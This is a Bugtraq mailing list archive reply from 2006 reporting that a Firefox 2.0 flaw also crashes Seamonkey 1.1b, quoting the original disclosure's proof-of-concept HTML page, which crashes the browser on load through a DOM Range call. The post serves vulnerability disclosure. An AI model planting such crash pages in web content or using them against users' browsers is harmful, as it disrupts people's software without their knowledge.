Bugtraq mailing list archives

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

From: sflist () gmx de
Date: Mon, 27 Nov 2006 08:43:04 +0100

Also crashes Seamonkey 1.1b on Suse 10.1



New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> 
<head> <script type="text/javascript"> function do_crash() { var 
range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>



-- 
"Ein Herz für Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
Unser Dankeschön: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht!

Current thread:

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution sflist (Nov 27)